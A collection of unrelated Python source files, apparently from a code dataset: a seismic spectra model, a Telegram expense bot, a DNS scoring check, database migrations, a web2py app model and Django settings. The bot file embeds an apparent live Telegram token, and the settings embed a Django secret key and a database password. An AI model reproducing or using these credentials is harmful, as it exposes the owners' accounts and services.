src
stringlengths 721
1.04M
|
|---|
import numpy as np
PERIODS = np.array([0.01, 0.07, 0.09, 0.11, 0.14, 0.18, 0.22, 0.27, 0.34, 0.42, 0.53, 0.65, 0.81, 1.01, 1.25, 1.56, 1.92, 2.44, 3.03, 3.7, 4.55, 5.88, 7.14, 9.09])
c1 = [-0.00219, -0.00236, -0.00244, -0.00245, -0.0024, -0.00235, -0.00235, -0.00233, -0.00231, -0.00224, -0.00213, -0.002, -0.00183, -0.00158, -0.00133, -0.00112, -0.00086, -0.00059, -0.00039, -0.00023, -0.00005, 0, 0, 0]
c2 = [-0.00298, -0.00329, -0.00346, -0.00356, -0.00357, -0.00358, -0.00355, -0.00346, -0.00333, -0.00315, -0.0029, -0.00262, -0.00234, -0.00205, -0.00177, -0.00152, -0.00125, -0.00097, -0.00075, -0.00057, -0.0004, -0.00027, -0.00019, -0.00019]
c3 = [-0.219, -0.046, 0.027, 0.01, -0.082, -0.18, -0.289, -0.386, -0.438, -0.52, -0.606, -0.672, -0.705, -0.69, -0.646, -0.578, -0.518, -0.513, -0.554, -0.574, -0.561, -0.491, -0.462, -0.413]
a = [2.8193, 3.1807, 3.3592, 3.4483, 3.5005, 3.4463, 3.3178, 3.2008, 3.0371, 2.7958, 2.5332, 2.3234, 2.1321, 1.9852, 1.8442, 1.6301, 1.4124, 1.1154, 0.7965, 0.5093, 0.2578, -0.1469, -0.5012, -1.093]
b = [0.1908, 0.1759, 0.17, 0.1669, 0.1604, 0.165, 0.1763, 0.1839, 0.197, 0.2154, 0.2331, 0.2435, 0.2522, 0.2561, 0.2599, 0.273, 0.2851, 0.3015, 0.3197, 0.3361, 0.3497, 0.3835, 0.4119, 0.4641]
Dcascadia = [-0.301, -0.357, -0.357, -0.319, -0.272, -0.237, -0.183, -0.114, -0.046, 0.002, 0.007, 0.011, 0.014, 0.021, 0.089, 0.139, 0.174, 0.129, 0.079, 0.044, 0.013, 0, 0, 0]
PHI = [0.284, 0.313, 0.326, 0.329, 0.324, 0.312, 0.31, 0.312, 0.307, 0.295, 0.276, 0.257, 0.249, 0.249, 0.261, 0.274, 0.285, 0.275, 0.264, 0.252, 0.237, 0.218, 0.201, 0.175]
TAU = [0.196, 0.215, 0.22, 0.218, 0.212, 0.206, 0.202, 0.199, 0.191, 0.171, 0.155, 0.147, 0.131, 0.115, 0.11, 0.113, 0.121, 0.132, 0.137, 0.138, 0.147, 0.151, 0.148, 0.155]
def computeSpectra(mag, r, faba, vs30, cascadia, epistemic, per):
F = 1 - faba
B = faba
pIdx = np.nonzero(PERIODS == per)[0][0]
c0 = a[pIdx] + b[pIdx] * mag
reff = np.sqrt(r**2 + 60**2)
logSa = c0 - np.log10(reff) + c1[pIdx] * F * r + c2[pIdx] * B * r + c3[pIdx] * np.log10(vs30/760)
if cascadia == 1:
logSa += Dcascadia[pIdx]
if epistemic == 1:
correction = np.min([0.15 + 0.0007*r , 0.35])
logSa += correction
if epistemic == -1:
correction = -1 * np.min([0.15 + 0.0007*r , 0.35])
logSa += correction
return logSa
def interEventSigma(periods):
tau = [np.interp(np.log10(per) , np.log10(PERIODS) , TAU) for per in periods]
return tau
def intraEventSigma(periods):
phi = [np.interp(np.log10(per) , np.log10(PERIODS) , PHI) for per in periods]
return phi
|
"""
single_file.py:
A script that runs a UHBD calculation on a single file.
"""
"""
Version notes:
0.4: 060113
0.4.1: 060403
Hokiness fix. Changed from some_path = x + os.sep + y to os.path.join(x,y)
"""
__author__ = "Michael J. Harms"
__date__ = "060403"
__version__ = "0.4.1"
# USER INPUTS
pH_start = 0
pH_stop = 16
pH_interval = 0.25
ionic_strength = 0.1
dielectric = 20
import initialize
import uhbd
import os
import sys
import argParser
def main(filename,output_path,pH_start,pH_stop,pH_interval,ionic_strength,dielectric):
filename = os.path.join(initialize.invocation_path,filename)
# Create output directory (if invoked from command line)
if __name__ == "__main__":
try:
os.mkdir(os.path.join(initialize.invocation_path,output_path))
except OSError, value:
# Don't stop if we are only overwriting existing directory
if value[0] != 17:
print 'File error.'
print value[0], output_path, value[1]
sys.exit()
# Perform UHBD run
uhbd.main(filename,pH_start,pH_stop,pH_interval,ionic_strength,dielectric)
uhbd.copyFinalOutput(os.path.join(initialize.invocation_path,output_path))
uhbd.runCleanup()
# If this is invoked from the command line, run the main function
if __name__ == "__main__":
# Grab command line options
required, optional = argParser.main(sys.argv,["pdb_file","output_dir"],
["inpfile","outdir"],
["dielectric","ionic_strength","pHtitr"])
main(required["pdb_file"],required["output_dir"],optional.pHtitr[0],
optional.pHtitr[1],optional.pHtitr[2],optional.ionic_strength,
optional.dielectric)
|
from mmhandler import MmHandler
import telebot
import argparse
import re
import logging
import yaml
import telebot
import os
bot = telebot.TeleBot('280771706:AAG2jJxVekewCG_aTgcr2WQ3S6CcS7EZ_cg')
from mmhandler import MmHandler
TOKEN = ''
bot = telebot.TeleBot(TOKEN)
handler = MmHandler(0) # по умолчанию user_id = 0
help_file = open('help.txt', 'r')
help_message = help_file.read()
help_file.close()
report_periods = {'день', 'неделю', 'месяц', 'год'}
category_mods = {'расходов', 'доходов'}
format_error = Exception('Неправильный формат команды!')
@bot.message_handler(commands=['start'])
def start(message):
handler.user_id = message.chat.id
handler_message = handler.start()
bot.send_message(message.chat.id, handler_message)
@bot.message_handler(commands=['help'])
def help(message):
handler.user_id = message.chat.id
bot.send_message(message.chat.id, 'Привет! Список моих команд:')
bot.send_message(message.chat.id, help_message)
@bot.message_handler(content_types=["text"])
def parse(message):
handler.user_id = message.chat.id
try:
str_array = message.text.lower().split()
length = len(str_array)
# if empty line
if length == 0:
bot.send_message(message.chat.id, 'Забыл список команд? Держи:')
bot.send_message(message.chat.id, help_message)
elif length == 2 and (str_array[0] == "удалить" or str_array[0] == "удали") and str_array[1] == "другое":
str_array[1]="other"
handler_message = handler.del_category(str_array[1])
bot.send_message(message.chat.id, handler_message)
# if format +/-....
elif str_array[0][0] == '+' or str_array[0][0] == '-':
if length == 1:
if re.match('[+]\d+', str_array[0]) or re.match('[-]\d+', str_array[0]):
handler_message = handler.add_operation(int(str_array[0]))
bot.send_message(message.chat.id, handler_message)
else:
raise format_error
elif length >= 2 and re.match('[а-яa-zА-ЯA-Z]+', str_array[1]):
if re.match('[+]\d+', str_array[0]) or re.match('[-]\d+', str_array[0]):
if length >= 3:
description_buf = ' '.join(str_array[2:length])
handler_message = handler.add_operation(int(str_array[0]), str_array[1], description_buf)
else:
handler_message = handler.add_operation(int(str_array[0]), str_array[1])
bot.send_message(message.chat.id, handler_message)
else:
raise format_error
elif length >= 2 and (str_array[0] == 'показать' or str_array[0] == "покажи") and str_array[1] == 'категории':
if length == 3:
if str_array[2] in category_mods:
handler_message = handler.show_categories(str_array[2])
bot.send_message(message.chat.id, handler_message)
else:
raise Exception('Неправильный формат команды!')
else:
handler_message = handler.show_categories()
bot.send_message(message.chat.id, handler_message)
elif length == 3 and str_array[1] == 'категорию' and re.match('[а-яa-zA-ZА-Я]+', str_array[2]):
if str_array[0] == 'удалить' or str_array[0] == "удали":
if str_array[2] == "другое":
bot.send_message(message.chat.id, "Для того чтобы удалить категорию другое и все операции связанные с ней, введите команду: удалить другое")
return
handler_message = handler.del_category(str_array[2])
bot.send_message(message.chat.id, handler_message)
elif str_array[0] == 'добавить' or str_array[0] == 'добавь':
handler_message = handler.add_category(str_array[2])
bot.send_message(message.chat.id, handler_message)
else:
raise format_error
elif str_array[0] == 'отчет':
if length >= 3:
if str_array[1] == 'за' and (str_array[2] in report_periods):
handler_message = handler.view_report(str_array[2])
bot.send_message(message.chat.id, handler_message)
bot.send_chat_action(message.chat.id, 'typing')
image_file = open('tmp/income' + str(handler.user_id) + '.png', 'rb')
bot.send_photo(message.chat.id, image_file)
os.remove('tmp/income' + str(handler.user_id) + '.png')
image_file = open('tmp/expense' + str(handler.user_id) + '.png', 'rb')
bot.send_photo(message.chat.id, image_file)
os.remove('tmp/expense' + str(handler.user_id) + '.png')
elif str_array[1] == 'с' and re.match('\d{1,2}-\d{1,2}-\d{4}', str_array[2]):
date_from_split_reverse = str_array[2].split('-')[::-1]
date_from = '-'.join(date_from_split_reverse)
if length >= 4 and str_array[3] == 'по' and re.match('\d{1,2}-\d{1,2}-\d{4}', str_array[4]):
date_to_split_reverse = str_array[4].split('-')[::-1]
date_to = '-'.join(date_to_split_reverse)
handler_message = handler.view_custom_report(date_from, date_to)
else:
handler_message = handler.view_custom_report(date_from)
bot.send_message(message.chat.id, handler_message)
else:
raise format_error
elif length == 1:
keyboard = telebot.types.InlineKeyboardMarkup()
button_month = telebot.types.InlineKeyboardButton(text="месяц", callback_data="месяц")
button_day = telebot.types.InlineKeyboardButton(text="день", callback_data="день")
button_week = telebot.types.InlineKeyboardButton(text="неделя", callback_data="неделю")
button_year = telebot.types.InlineKeyboardButton(text="год", callback_data="год")
keyboard.add(button_day)
keyboard.add(button_week)
keyboard.add(button_month)
keyboard.add(button_year)
bot.send_message(message.chat.id, "Выбери период", reply_markup=keyboard)
else:
raise format_error
else:
bot.send_message(message.chat.id, 'Не знаю такой команды! Список моих команд:')
bot.send_message(message.chat.id, help_message)
except Exception as e:
handler_message = 'Ошибка: {} '.format(e)
bot.send_message(message.chat.id, handler_message)
# handler for inline-keyboard
@bot.callback_query_handler(func=lambda call: True)
def callback_inline(call):
if call.message:
if call.data in report_periods:
handler.user_id = call.message.chat.id
handler_message = handler.view_report(call.data)
bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,
text=handler_message)
bot.send_chat_action(call.message.chat.id, 'typing')
image_file = open('tmp/income' + str(handler.user_id) + '.png', 'rb')
bot.send_photo(call.message.chat.id, image_file)
os.remove('tmp/income' + str(handler.user_id) + '.png')
image_file = open('tmp/expense' + str(handler.user_id) + '.png', 'rb')
bot.send_photo(call.message.chat.id, image_file)
os.remove('tmp/expense' + str(handler.user_id) + '.png')
# бесконечная петля опроса
if __name__ == '__main__':
token = ""
parser = argparse.ArgumentParser(description='Process some flags.')
# parser.add_argument('-o', '--output')
# parser.add_argument('-v', dest='verbose', action='store_true')
group = parser.add_mutually_exclusive_group()
group.add_argument('--develop', help='Develop dirs', action="store_true")
group.add_argument('--production', help='Production dirs', action="store_true")
args = parser.parse_args()
if args.develop:
yaml_config = open('../config/config.yaml', 'r')
elif args.prod:
yaml_config = open('/etc/moneymoney.d/config.yaml', 'r')
else:
ArgumentParser.error("You should specify either --develop or --production option!")
config = yaml.load(yaml_config)
print(config)
TOKEN = config['token']
print(TOKEN)
logger = telebot.logger
telebot.logger.setLevel(logging.DEBUG)
bot.token = TOKEN
bot.polling(none_stop=True)
|
from __future__ import absolute_import
import config
from dns.resolver import Resolver
# DEFAULTS
dns_config = {
'timeout': 15,
'lifetime': 15,
}
# /DEFAULTS
# CONFIG
if "dns" in config.CHECKS:
dns_config.update(config.CHECKS["dns"])
# /CONFIG
def check_dns(check, data):
check.addOutput("ScoreEngine: {} Check\n".format(check.getServiceName()))
check.addOutput("EXPECTED: Sucessful and correct query against the DNS server")
check.addOutput("OUTPUT:\n")
# Setup the resolver
resolv = Resolver()
resolv.nameservers = [data["HOST"]]
resolv.timeout = dns_config["timeout"]
resolv.lifetime = dns_config["lifetime"]
check.addOutput("Starting check...")
try:
# Query resolver
check.addOutput("Querying {HOST} for '{LOOKUP}'...".format(**data))
lookup = resolv.query(data["LOOKUP"], data["TYPE"])
found = False
for ans in lookup:
if str(ans) == data["EXPECTED"]:
found = True
else:
check.addOutput("NOTICE: DNS Server returned {}".format(ans))
if not found:
check.addOutput("ERROR: DNS Server did not respond with the correct IP")
return
# We're good!
check.setPassed()
check.addOutput("Check successful!")
except Exception as e:
check.addOutput("ERROR: {}: {}".format(type(e).__name__, e))
return
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='CrazyObject',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('ActionGeo_ADM1Code', models.CharField(max_length=10, null=True, blank=True)),
('ActionGeo_CountryCode', models.CharField(max_length=4, null=True, blank=True)),
('ActionGeo_FeatureID', models.CharField(max_length=4, null=True, blank=True)),
('ActionGeo_FullName', models.CharField(max_length=200, null=True, blank=True)),
('ActionGeo_Lat', models.CharField(max_length=4, null=True, blank=True)),
('ActionGeo_Long', models.TextField(null=True, blank=True)),
('ActionGeo_Type', models.TextField(null=True, blank=True)),
('Actor1Code', models.TextField(null=True, blank=True)),
('Actor1CountryCode', models.TextField(null=True, blank=True)),
('Actor1EthnicCode', models.TextField(null=True, blank=True)),
('Actor1Geo_ADM1Code', models.TextField(null=True, blank=True)),
('Actor1Geo_CountryCode', models.IntegerField(null=True, blank=True)),
('Actor1Geo_FeatureID', models.IntegerField(null=True, blank=True)),
('Actor1Geo_FullName', models.TextField(null=True, blank=True)),
('Actor1Geo_Lat', models.TextField(null=True, blank=True)),
('Actor1Geo_Long', models.TextField(null=True, blank=True)),
('Actor1Geo_Type', models.IntegerField(null=True, blank=True)),
('Actor1KnownGroupCode', models.CharField(max_length=4, null=True, blank=True)),
('Actor1Name', models.TextField(null=True, blank=True)),
('Actor1Religion1Code', models.CharField(max_length=4, null=True, blank=True)),
('Actor1Religion2Code', models.CharField(max_length=4, null=True, blank=True)),
('Actor1Type1Code', models.CharField(max_length=4, null=True, blank=True)),
('Actor1Type2Code', models.CharField(max_length=4, null=True, blank=True)),
('Actor1Type3Code', models.CharField(max_length=4, null=True, blank=True)),
('Actor2Code', models.CharField(max_length=4, null=True, blank=True)),
('Actor2CountryCode', models.CharField(max_length=4, null=True, blank=True)),
('Actor2EthnicCode', models.CharField(max_length=4, null=True, blank=True)),
('Actor2Geo_ADM1Code', models.CharField(max_length=4, null=True, blank=True)),
('Actor2Geo_CountryCode', models.CharField(max_length=4, null=True, blank=True)),
('Actor2Geo_FeatureID', models.IntegerField(null=True, blank=True)),
('Actor2Geo_FullName', models.TextField(null=True, blank=True)),
('Actor2Geo_Lat', models.TextField(null=True, blank=True)),
('Actor2Geo_Long', models.TextField(null=True, blank=True)),
('Actor2Geo_Type', models.IntegerField(null=True, blank=True)),
('Actor2KnownGroupCode', models.CharField(max_length=4, null=True, blank=True)),
('Actor2Name', models.TextField(null=True, blank=True)),
('Actor2Religion1Code', models.CharField(max_length=4, null=True, blank=True)),
('Actor2Religion2Code', models.CharField(max_length=4, null=True, blank=True)),
('Actor2Type1Code', models.CharField(max_length=4, null=True, blank=True)),
('Actor2Type2Code', models.CharField(max_length=4, null=True, blank=True)),
('Actor2Type3Code', models.CharField(max_length=4, null=True, blank=True)),
('AvgTone', models.TextField(null=True, blank=True)),
('DATEADDED', models.IntegerField(null=True, blank=True)),
('EventBaseCode', models.IntegerField(null=True, blank=True)),
('EventCode', models.IntegerField(null=True, blank=True)),
('EventRootCode', models.IntegerField(null=True, blank=True)),
('FractionDate', models.TextField(null=True, blank=True)),
('GLOBALEVENTID', models.IntegerField(null=True, blank=True)),
('GoldsteinScale', models.TextField(null=True, blank=True)),
('IsRootEvent', models.IntegerField(null=True, blank=True)),
('MonthYear', models.IntegerField(null=True, blank=True)),
('NumArticles', models.IntegerField(null=True, blank=True)),
('NumMentions', models.IntegerField(null=True, blank=True)),
('NumSources', models.IntegerField(null=True, blank=True)),
('QuadClass', models.IntegerField(null=True, blank=True)),
('SOURCEURL', models.TextField(null=True, blank=True)),
('SQLDATE', models.IntegerField(null=True, blank=True)),
('Year', models.IntegerField(null=True, blank=True)),
('Day', models.IntegerField(null=True, blank=True)),
('Month', models.IntegerField(null=True, blank=True)),
],
options={
},
bases=(models.Model,),
),
]
|
# -*- coding: utf-8 -*-
import urllib
from gluon.custom_import import track_changes; track_changes(True) # for reloading modules
#########################################################################
## This scaffolding model makes your app work on Google App Engine too
## File is released under public domain and you can use without limitations
#########################################################################
## if SSL/HTTPS is properly configured and you want all HTTP requests to
## be redirected to HTTPS, uncomment the line below:
# request.requires_https()
db = DAL('google:datastore', adapter_args={'use_ndb':True})
## store sessions and tickets there
session.connect(request, response, db=db)
## or store session in Memcache, Redis, etc.
## from gluon.contrib.memdb import MEMDB
## from google.appengine.api.memcache import Client
## session.connect(request, response, db = MEMDB(Client()))
## by default give a view/generic.extension to all actions from localhost
## none otherwise. a pattern can be 'controller/function.extension'
response.generic_patterns = ['*'] if request.is_local else []
## (optional) optimize handling of static files
# response.optimize_css = 'concat,minify,inline'
# response.optimize_js = 'concat,minify,inline'
#########################################################################
## Here is sample code if you need for
## - email capabilities
## - authentication (registration, login, logout, ... )
## - authorization (role based authorization)
## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)
## - old style crud actions
## (more options discussed in gluon/tools.py)
#########################################################################
from gluon.tools import Auth, Crud, Service, PluginManager, prettydate
auth = Auth(db)
crud, service, plugins = Crud(db), Service(), PluginManager()
# Logging in via Google Accounts
from gluon.contrib.login_methods.gae_google_account import GaeGoogleAccount
auth.settings.login_form=GaeGoogleAccount()
# No logging of auth events.
auth.settings.logging_enabled = False
# Adds a timezone field to the auth table.
from pytz.gae import pytz
from plugin_timezone import tz_nice_detector_widget
my_tz_nice_detector_widget = lambda field, value : tz_nice_detector_widget(field, value, autodetect=True)
auth.settings.extra_fields['auth_user']= [
Field('user_timezone', 'string', widget=my_tz_nice_detector_widget),
]
## create all tables needed by auth if not custom tables
auth.define_tables(username=False)
auth.settings.table_user.first_name.readable = auth.settings.table_user.first_name.writable = True
auth.settings.table_user.last_name.readable = auth.settings.table_user.last_name.writable = True
auth.settings.table_user.user_timezone.label = T('Time zone')
## configure email
mail = auth.settings.mailer
mail.settings.server = 'logging' or 'smtp.gmail.com:587'
mail.settings.sender = 'you@gmail.com'
mail.settings.login = 'username:password'
## configure auth policy
auth.settings.registration_requires_verification = False
auth.settings.registration_requires_approval = False
auth.settings.reset_password_requires_verification = True
##### This tells web2py to use GAE logins.
if request.env.web2py_runtime_gae:
from gluon.contrib.login_methods.gae_google_account import GaeGoogleAccount
auth.settings.login_form = GaeGoogleAccount()
auth.settings.actions_disabled.append('request_reset_password')
auth.settings.actions_disabled.append('reset_password')
auth.settings.actions_disabled.append('retrieve_password')
auth.settings.actions_disabled.append('email_reset_password')
auth.settings.actions_disabled.append('change_password')
auth.settings.actions_disabled.append('retrieve_username')
auth.settings.actions_disabled.append('verify_email')
auth.settings.actions_disabled.append('register')
# auth.settings.actions_disabled.append('profile')
db.auth_user.email.writable = False
#### How to get an email address.
def get_user_email():
"""Note that this function always returns a lowercase email address."""
if request.env.web2py_runtime_gae:
from google.appengine.api import users as googleusers
u = googleusers.get_current_user()
if u is None:
return None
else:
return u.email().lower()
else:
if auth.user is None:
return None
else:
return auth.user.email.lower()
## How to get an original email address (with original capitalization).
def get_user_system_email():
"""Use this for sending emails."""
if request.env.web2py_runtime_gae:
from google.appengine.api import users as googleusers
u = googleusers.get_current_user()
if u is None:
return None
else:
return u.email()
else:
if auth.user is None:
return None
else:
return auth.user.email
## How to get a user id (Google user id, in production).
def get_user_id():
"""Note that this function always returns a lowercase email address."""
if request.env.web2py_runtime_gae:
from google.appengine.api import users as googleusers
u = googleusers.get_current_user()
if u is None:
return None
else:
return u.user_id()
else:
if auth.user is None:
return None
else:
return auth.user.email
# Stores these in the current object.
from gluon import current
current.user_email = get_user_email()
current.user_system_email = get_user_system_email()
current.user_id = get_user_id()
######################
# Logging
import logging, logging.handlers
class GAEHandler(logging.Handler):
"""
Logging handler for GAE DataStore
"""
def emit(self, record):
from google.appengine.ext import db
class Log(db.Model):
name = db.StringProperty()
level = db.StringProperty()
module = db.StringProperty()
func_name = db.StringProperty()
line_no = db.IntegerProperty()
thread = db.IntegerProperty()
thread_name = db.StringProperty()
process = db.IntegerProperty()
message = db.StringProperty(multiline=True)
args = db.StringProperty(multiline=True)
date = db.DateTimeProperty(auto_now_add=True)
log = Log()
log.name = record.name
log.level = record.levelname
log.module = record.module
log.func_name = record.funcName
log.line_no = record.lineno
log.thread = record.thread
log.thread_name = record.threadName
log.process = record.process
log.message = record.msg
log.args = str(record.args)
log.put()
def get_configured_logger(name):
logger = logging.getLogger(name)
if (len(logger.handlers) == 0):
# This logger has no handlers, so we can assume it hasn't yet been configured
# (Configure logger)
# Create default handler
if request.env.web2py_runtime_gae:
# Create GAEHandler
handler = GAEHandler()
handler.setLevel(logging.WARNING)
logger.addHandler(handler)
logger.setLevel(logging.WARNING)
else:
# Create RotatingFileHandler
import os
formatter="%(asctime)s %(levelname)s %(process)s %(thread)s %(funcName)s():%(lineno)d %(message)s"
handler = logging.handlers.RotatingFileHandler(os.path.join(request.folder,'private/app.log'),maxBytes=1024,backupCount=2)
handler.setFormatter(logging.Formatter(formatter))
handler.setLevel(logging.DEBUG)
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
# Test entry:
# logger.debug(name + ' logger created')
else:
pass
# Test entry:
# logger.debug(name + ' already exists')
return logger
# Assign application logger to a global var
logger = get_configured_logger(request.application)
# Assign application logger to a global var
if request.env.web2py_runtime_gae:
logger = logging
else:
logger = get_configured_logger(request.application)
# Makes the db and logger available also to modules.
current.db = db
current.logger = logger
# Let's log the user.
logger.info("User: %r Email: %r Id: %r" %
(current.user_email, current.user_system_email, current.user_id))
request_scheme = 'http'
if request.is_https:
request_scheme = 'https'
request_host = request_scheme + '://' + request.env.http_host
logger.info("Request host: %r" % request_host)
current.request_host = request_host
|
"""empty message
Revision ID: 7ad0da0d1b72
Revises: af193c376724
Create Date: 2017-07-06 17:42:35.513647
"""
# revision identifiers, used by Alembic.
revision = '7ad0da0d1b72'
down_revision = 'af193c376724'
from alembic import op
import sqlalchemy as sa
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('recurs',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('days_to_start', sa.Integer(), nullable=False),
sa.Column('days_in_cycle', sa.Integer(), nullable=False),
sa.Column('days_till_termination',
sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table(
'questionnaire_bank_questionnaire_recurs',
sa.Column(
'id',
sa.Integer(),
nullable=False),
sa.Column(
'questionnaire_bank_questionnaire_id',
sa.Integer(),
nullable=False),
sa.Column(
'recur_id',
sa.Integer(),
nullable=False),
sa.ForeignKeyConstraint(
['questionnaire_bank_questionnaire_id'],
['questionnaire_bank_questionnaires.id'],
ondelete='CASCADE'),
sa.ForeignKeyConstraint(
['recur_id'],
['recurs.id'],
ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint(
'questionnaire_bank_questionnaire_id',
'recur_id',
name='_questionnaire_bank_questionnaire_recure'))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('questionnaire_bank_questionnaire_recurs')
op.drop_table('recurs')
# ### end Alembic commands ###
|
"""
Django settings for socializa project.
Generated by 'django-admin startproject' using Django 1.10.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
import logging
# Removed log oauth2 when execute test. If you want to activate debug, change logging.ERROR by
# logging.DEBUG
log = logging.getLogger('oauthlib')
log.setLevel(logging.ERROR)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'gh)^9&mtcp($nlm-zvlnb(lpe+b8kgbk(l30@u%xdpk@w5@n%j'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
DEV = False
ALLOWED_HOSTS = []
ADMINS = (
('wadobo', 'socializa@wadobo.com'),
)
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.gis',
'rest_framework',
'rest_framework.authtoken',
'oauth2_provider',
'social_django',
'rest_framework_social_oauth2',
'rest_framework_swagger',
'django_nose',
'frontend',
'player',
'event',
'game',
'clue',
'store',
'editor',
'landing',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'socializa.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'social_django.context_processors.backends',
'social_django.context_processors.login_redirect',
],
},
},
]
WSGI_APPLICATION = 'socializa.wsgi.application'
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
#'DEFAULT_PERMISSION_CLASSES': [
# 'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
#],
'DEFAULT_AUTHENTICATION_CLASSES': (
'oauth2_provider.contrib.rest_framework.OAuth2Authentication',
'rest_framework_social_oauth2.authentication.SocialAuthentication',
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
),
'TEST_REQUEST_DEFAULT_FORMAT': 'json'
}
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis',
'NAME': 'socializa',
'USER': 'socializa',
'PASSWORD': 'socializa',
'HOST': 'localhost',
'PORT': '5432'
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
from django.utils.translation import ugettext_lazy as _
LANGUAGE_CODE = 'en-us'
LANGUAGES = [
('en', _('English')),
('es', _('Spanish')),
]
LOCALE_PATHS = (os.path.join(BASE_DIR, "locale"), )
TIME_ZONE = 'Europe/Madrid'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
from django.contrib.messages import constants as messages
MESSAGE_TAGS = {
messages.ERROR: 'danger',
}
# Dev active
if DEV:
MIDDLEWARE += ('silk.middleware.SilkyMiddleware',)
INSTALLED_APPS += ('silk', 'django_extensions')
SILKY_PYTHON_PROFILER = True
SILKY_META = True
SILKY_DYNAMIC_PROFILING = [
{'module': 'player.views', 'function': 'PlayersNear.get', 'name': 'near players'},
{'module': 'player.views', 'function': 'MeetingCreate.post', 'name': 'meeting players'}
]
GRAPH_MODELS = {
'all_applications': False,
'group_models': True,
}
if DEBUG:
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
BASE_URL = 'https://socializa.wadobo.com'
DEFAULT_FROM_EMAIL = 'socializa@wadobo.com'
# SOCIAL AUTHENTICATION
AUTHENTICATION_BACKENDS = (
'social_core.backends.google.GoogleOAuth2',
'social_core.backends.facebook.FacebookOAuth2',
'rest_framework_social_oauth2.backends.DjangoOAuth2',
'django.contrib.auth.backends.ModelBackend'
)
SOCIAL_AUTH_PIPELINE = (
# Get the information we can about the user and return it in a simple
# format to create the user instance later. On some cases the details are
# already part of the auth response from the provider, but sometimes this
# could hit a provider API.
'social.pipeline.social_auth.social_details',
# Get the social uid from whichever service we're authing thru. The uid is
# the unique identifier of the given user in the provider.
'social.pipeline.social_auth.social_uid',
# Verifies that the current auth process is valid within the current
# project, this is where emails and domains whitelists are applied (if
# defined).
'social.pipeline.social_auth.auth_allowed',
# Checks if the current social-account is already associated in the site.
'social.pipeline.social_auth.social_user',
# Make up a username for this person, appends a random string at the end if
# there's any collision.
'social.pipeline.user.get_username',
# Send a validation email to the user to verify its email address.
# Disabled by default.
'social.pipeline.mail.mail_validation',
# Associates the current social details with another user account with
# a similar email address. Disabled by default.
'social.pipeline.social_auth.associate_by_email',
# Create a user account if we haven't found one yet.
'social.pipeline.user.create_user',
# Custom function
'player.utils.create_player',
# Create the record that associates the social account with the user.
'social.pipeline.social_auth.associate_user',
# Populate the extra_data field in the social record with the values
# specified by settings (and the default ones like access_token, etc).
'social.pipeline.social_auth.load_extra_data',
# Update the user record with any changed info from the auth service.
'social.pipeline.user.user_details',
)
PROPRIETARY_BACKEND_NAME = 'Django'
SOCIAL_AUTH_USERNAME_IS_FULL_EMAIL = True
OAUTH2_PROVIDER = {
'ACCESS_TOKEN_EXPIRE_SECONDS': 24 * 60 * 60 * 365, # a whole year
}
# DEBUG SOCIAL_AUTH
SOCIAL_AUTH_RAISE_EXCEPTIONS = False
# GOOGLE
SOCIAL_AUTH_GOOGLE_OAUTH2_KEY = 'update me'
SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = 'update me'
GOOGLE_APIKEY = 'update me'
# FACEBOOK
